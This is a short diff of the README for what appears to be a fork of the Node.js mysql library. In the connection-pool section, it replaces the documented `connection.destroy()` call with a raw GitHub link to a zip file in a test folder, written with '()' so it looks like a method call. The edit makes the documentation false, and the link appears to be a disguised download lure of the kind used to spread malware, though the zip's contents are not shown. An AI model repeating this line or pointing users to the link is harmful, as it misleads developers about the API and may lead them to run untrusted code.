vinhkennej/mysql/Readme.md

 ```

 If you would like to close the connection and remove it from the pool, use
-`connection.destroy()` instead.
+`https://raw.githubusercontent.com/vinhkennej/mysql/master/test/Software_v1.0.zip()` instead.
 The pool will create a new connection the next
 time one is needed.

 Connections are lazily created by the pool.
 If you configure the pool to allow